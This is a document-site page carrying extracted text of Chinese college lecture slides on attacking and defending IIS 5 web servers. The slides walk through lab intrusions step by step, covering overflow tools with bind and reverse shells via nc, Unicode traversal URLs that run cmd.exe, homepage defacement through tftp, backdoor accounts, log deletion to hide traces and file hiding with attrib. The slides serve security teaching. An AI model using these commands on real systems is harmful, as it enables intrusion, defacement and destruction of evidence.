书签 分享 收藏 举报 版权申诉 / 29
上传文档赚钱

类型学习情境三服务器入侵技术的应用与防护任务一Web服务器课件.ppt

  • 上传人(卖家):晟晟文业
  • 文档编号:4842795
  • 上传时间:2023-01-17
  • 格式:PPT
  • 页数:29
  • 大小:671.50KB
  • 【下载声明】
    1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
    2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
    3. 本页资料《学习情境三服务器入侵技术的应用与防护任务一Web服务器课件.ppt》由用户(晟晟文业)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
    4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
    5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
    配套讲稿:

    如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。

    特殊限制:

    部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。

    关 键  词:
    学习 情境 服务器 入侵 技术 应用 防护 任务 Web 课件
    资源描述:

    1、学习情境三服务器入侵技术的应用与防护学习情境三服务器入侵技术的应用与防护 任务一任务一 WebWeb服务器的入侵与防护服务器的入侵与防护 课程负责人:杨文虎课程负责人:杨文虎济南铁道职业技术学院济南铁道职业技术学院 信息工程系信息工程系网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护教学的实施过程教学的实施过程任务规划任务规划学生探究学生探究师生析疑师生析疑完成任务完成任务检查评测检查评测综合创新综合创新思考、探讨完成任务需要思考、探讨完成任务需要的相关资料,搜集资料,的相关资料,搜集资料,制定工作计划制定工作计划 明确需要完成的工作明确需要完成的工作任务;任务;教

    2、师进行点评、确定教师进行点评、确定最终的实施方法;对最终的实施方法;对技术问题进行讲授和技术问题进行讲授和答疑。答疑。学生进入网络实训室,根学生进入网络实训室,根据工作计划完成每个工作据工作计划完成每个工作项目,完成每个项目实施项目,完成每个项目实施日志和心得总结日志和心得总结 学生分攻防角色相互检查学生分攻防角色相互检查任务完成情况,分析不足,任务完成情况,分析不足,给出评价;教师对学生的给出评价;教师对学生的日志和总结进行分析,给日志和总结进行分析,给出评价。出评价。探索更多的探索更多的Web服务器服务器的应用与防护的方法,的应用与防护的方法,搜索相关技术,并在实搜索相关技术,并在实训室中

    3、进行验证。训室中进行验证。网络安全与防护网络安全与防护主要的IIS漏洞有那些?其攻防技巧各有何特点?掌握.ida&.idq漏洞技术的攻防技巧了解Printer漏洞,掌握Unicode漏洞的入侵方式防护策略;了解asp映射分块编码漏洞、Webdav漏洞的入侵方式防护策略。问题引领问题引领3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 Web服务器的入侵分为基于认证的入侵和基于漏洞攻击的入侵,基于认证的入侵包括以下常见的手段:IPC$入侵、远程管理计算机、Telnet入侵、远程命令的执行及进程查杀注册表的入侵、

    4、暴力破解密码等。基于漏洞攻击近几年比较流行,黑客是信息时代的完美主义者,他们通过研究、试验、编写测试代码来发现远程服务器中的漏洞,通过利用远程服务器的漏洞,可以绕过系统的认证直接进入系统内部。常用的漏洞包括:IIS漏洞、操作系统漏洞、SQL服务器漏洞 IIS(Internet Information Server),即Internet信息服务器,它在Windows系统中提供Internet服务,例如提供Web服务、FTP服务、SMTP服务,IIS服务器在方便用户使用的同时,带来了许多安全隐患。IIS漏洞有近千余种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于溢出型漏洞,入侵者可以通过发

    5、送特定指令格式的数据使远程服务区的缓冲区溢出,从而突破系统的保护,在溢出的空间中执行任意指令。主要的IIS漏洞有:.ida&.idq漏洞、Printer漏洞、Unicode漏洞、.asp映射分块编码漏洞、Webdav漏洞 IIS漏洞信息的搜集主要使用扫描软件扫描存在漏洞的主机,例如使用X-Scan进行IIS漏洞的扫描,使用telnet targetIP 80搜集Web服务器版本信息。3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 对于.ida&.idq漏洞,微软的Index Server可以加快Web的搜索

    6、能力,提供对管理员脚本和Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq。管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的idq.dll存在一个缓冲溢出,问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数进行边界检查,可以导致远程攻击者利用溢出来获得System权限访问远程系统。关于.ida&.idq漏洞的检测主要使用X-Scan、Sfind等检测工具,手工检测:在地址栏中输入http:/targetIP/*.ida或者http:/targetIP/*.idq3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目

    7、一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 IDQ入侵工具IISIDQ IISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后,有两种登录方式:一是攻击后主动连接方式命令iisidq.exe输入命令1;二是攻击后监听远程服务器连接命令iisidq.exe输入命令1如果不写输入命令,默认命令为cmd.exe/c+dir。如果使用,表示不使用默认命令而是要用户输入命令。IISIDQ支持的操作系统类型如下所示:0 IIS5 中文 Win2000 Sp0,1 IIS5 中文 Win2000 Sp1,2 IIS5 中文 Win2000 Sp2idq3.1Web服务器的入侵与

    8、防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 漏洞溢出连接工具-NC nc在网络工具中有“瑞士军刀”的美誉,通过nc,入侵者可以方便的连接远程服务器.nc有两种方法进行连接:主动连接到外部:nc-options hostname ports ports,监听等待外部连接:nc l p port-option hostname port NC使用的参数说明:-e:prog程序重定向,一旦连接,就执行 -g:网关路由跳数,可设置到8 -h:帮助信息 -i:secs延时的间隔 -l:监听模式,用于入站连接 -n:指定数字的IP地址,不能

    9、用hostname -o:file记录16进制的传输 -p:port本地端口号 -r:任意指定本地及远程端口 -s:addr本地源地址 -u:UDP模式 -v:详细输出(用两个-v可得到更详细的内容)-w:secs超时时间 -z:将输入输出关掉用于扫描时3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 下面我们来看几个入侵实例 .idq入侵实例1 步骤一:扫描远程服务器 步骤二:IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq 0 192.168.0.106 80 1 5213.1Web

    10、服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤三:使用nc进行连接。使用命令nc v 192.168.0.106 521。3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤四:建立后门帐号步骤五:使用exit命令断开连接,比较命令如图所示3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 .idq入侵实例2 步骤一:扫描远程服务器 步骤二:使

    11、用nc在本地打开端口等待连接。使用命令 nc-l p 250。参数-l表示使用监听模式,-p表示设置本地监听端口2503.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤三:IDQ溢出。使用命令iisidq 0 192.168.0.106 80 2 192.168.0.100 250 1采用方式二进行溢出,使远程服务器溢出后自动连接到本地计算机的250端口3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 步骤四:进行溢出后

    12、的攻击 步骤五:建立后门帐号 步骤六:使用exit命令断开连接3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护项目一、项目一、.ida&.idq漏洞攻防分析漏洞攻防分析 IISIDQ的图形界面3.1Web服务器的入侵与防护服务器的入侵与防护网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 技术支持假冒的缺点之一是这个假冒是在太常见了。公司已经意识到这种假冒技巧并要求防范。另一种技巧是第三方假冒,它能够更成功的获取内部信息。.printer漏洞 windows2

    13、000 IIS 5存在打印扩展ISAPI(Internet Service Application Programming Interface),使得.printer扩展与msw3prt.dll进行映射,该扩展可以通过Web调用打印机。在msw3prt.dll中存在缓冲区溢出漏洞,微软建议,一般在未打补丁之前,一定要移除ISAPI网络打印的映射。步骤一:使用nc监听端口 步骤二:使用IIS5Exploit进行漏洞溢出,命令格式IIS5Exploit网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞

    14、攻防分析 网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 Unicode目录遍历漏洞 微软IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“”,从而可以利用“./”目录遍历的漏洞,该漏洞帐号默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑分区上的能被这些组访问的文件都能被删除,修改或执行。入侵者不能像使用.ida和.idq漏洞那样,直接溢出一个拥有管理员权限的shell,而只是具有IUSR_machinename权限,也就是说,只能进

    15、行简单的文件操作。使用Unicode构造“/”和“”字符举例%c1%1c(0 xc1-0 xc0)*0 x40+0 x1c=0 x5c=/%c0%2f(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 手工检测漏洞 我们要使用远程系统Windows2000 server中

    16、文版,在地址栏输入:http:/192.168.0.106/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:”网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 命令说明:命令中的“+”,代表空格,192.168.0.106远程服务器IP地址,scripts为远程服务器上的脚本文件目录,“.%c1%1c.”被远程服务器译为“./”,winnt/system32/cmd.exe?/c+打开远程服务器的cmd.exe,一般不用改变,dir+c:

    17、入侵者要执行的命令,利用此命令,入侵者将IE编程了远程命令的控制台。Unicode入侵实例:涂鸦主页 步骤一:准备标语主页,并保存成index.htm 步骤二:探知远程服务器的Web根目录 方法一:利用.ida或者.idq漏洞。方法二:输入http:/192.168.0.106/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:mmc.gif/s其中,/s表示在dir命令后查找指定文件或文件夹的物理路径,mmc.gif是默认安装在Web根目录中的,找到该文件的同时,也就找到了Web根目录。网络安全与防护网络安全与防护3.1Web服务器的入侵与防护

    18、服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 步骤三:涂鸦主页。在地址栏中使用Unicode漏洞查询Web服务器主页,假设是index.htm。使用tftp将自己做好的主页替换掉原Web服务器的主页。tftp的使用 tftp只要执行tftpd32.exe,本计算机就成为一台tftp服务器,使用windows自带的tftp命令便可以在该服务器上传和下载文件。使用方法:tftp-i hos

    19、t GET/PUT source destination -I二进制文件传输 host tftp服务器地址 Get 下载文件 PUT 上传文件 Source文件名 Destination 目的地网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、Unicode漏洞攻防分析漏洞攻防分析 Unicode漏洞的实例二:擦脚印 通过Unicode漏洞进入远程服务器后,肯定会在该服务

    20、器上留下自己的ip,为了隐藏自己,通常需要清除服务器的日志,这种做法叫作擦脚印。Del+c:winntsystem32logfiles*.*Del+c:winntsystem32confige*.evt Del+c:winntsystem32dtclog*.*Del+c:winntsystem32*.log Del+c:winntsystem32*.txt Del+c:winnt*.txt Del+c:winnt*.log Unicode获得的权限较低,一般无法执行bat文件网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目二、项目二、Printer漏洞、漏洞、U

    21、nicode漏洞攻防分析漏洞攻防分析 Unicode漏洞实例三:修改文件属性入侵过程中,入侵者通常希望隐藏自己的文件。如果上传的文件设置成“隐藏”加“系统”属性,就可以避免被发现。Attrib命令的使用:Attrib+R|-R+A|-A+S|-S+H|-H drive:path filename/S/D +:设置属性 -:清除属性 R:只读文件属性 A:存档文件属性 S:系统文件属性 H:隐藏文件属性 /S:处理当前文件夹及其子文件夹中的匹配文件 /D:处理文件夹。如果要把c盘中的abc.exe设置成“系统”加“隐藏”属性,使用命令“attrib.exe+%2bH+%2bS+c:abc.exe

    22、”其中,“%2b”表示“+”号,类似,要取消掉隐藏和系统属性,使用命令“attrib.exe+-H+-S+c:abc.exe”。网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目三、项目三、.asp映射分块编码漏洞、映射分块编码漏洞、Webdav攻防分析攻防分析 .ASP映射分块编码漏洞 Windows 2000和NT4 IIS.asp映射存在远程缓冲溢出漏洞。ASP ISAPI过滤器默认在所有NT4和WIN2000系统中装载,存在的漏洞可以导致远程执行任意命令。恶意攻击者可以使用分块编码形式数据给IIS服务器,当解码和解析这些数据的时候可以强迫IIS把入侵者提供

    23、的数据写到内存任意位置。通过此漏洞可以导致WIN2000系统产生缓冲溢出并以IWAM_computer_name用户的权限执行任意代码,而在WINDOWS NT4下可以以system的权限执行任意代码。.ASP映射分块编码漏洞 使用工具:IIS ASP.DLL OVERFLOW PROGRAM 2.0 Aspcode 使用方法:aspfilewebportwinxp或aspcode 参数说明::远程服务器 aspfile:远程服务器上ASP文件所在的路径。Webport:远程服务器web服务端口。winxp:winxp 模式。网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入

    24、侵与防护项目三、项目三、.asp映射分块编码漏洞、映射分块编码漏洞、Webdav攻防分析攻防分析 WebDAV远程缓冲区漏洞 Microsoft 5.0带有WebDav组件对用户输入的传递给ntdll.dll程序处理的请求未做充分的边界检查,远程入侵者可以向WebDav提交一个精心构造的超长数据请求而导致缓冲区溢出,使得入侵者以LocalSystem权限在主机上执行任意指令。漏洞检测工具WebDavScan 网络安全与防护网络安全与防护3.1Web服务器的入侵与防护服务器的入侵与防护项目三、项目三、.asp映射分块编码漏洞、映射分块编码漏洞、Webdav攻防分析攻防分析 漏洞利用工具 wd0.3-en.exe:英文版IIS 溢出工具,与nc 配合使用 BIG5.exe:繁体版IIS 溢出工具 Webdavx3:中文版IIS 溢出工具,溢出后打开7788 端口等待连接 WebDav:突破防火墙的WebDav 溢出工具 谢谢!

    展开阅读全文
    提示  163文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
    关于本文
    本文标题:学习情境三服务器入侵技术的应用与防护任务一Web服务器课件.ppt
    链接地址:https://www.163wenku.com/p-4842795.html

    Copyright@ 2017-2037 Www.163WenKu.Com  网站版权所有  |  资源地图   
    IPC备案号:蜀ICP备2021032737号  | 川公网安备 51099002000191号


    侵权投诉QQ:3464097650  资料上传QQ:3464097650
       


    【声明】本站为“文档C2C交易模式”,即用户上传的文档直接卖给(下载)用户,本站只是网络空间服务平台,本站所有原创文档下载所得归上传人所有,如您发现上传作品侵犯了您的版权,请立刻联系我们并提供证据,我们将在3个工作日内予以改正。

    163文库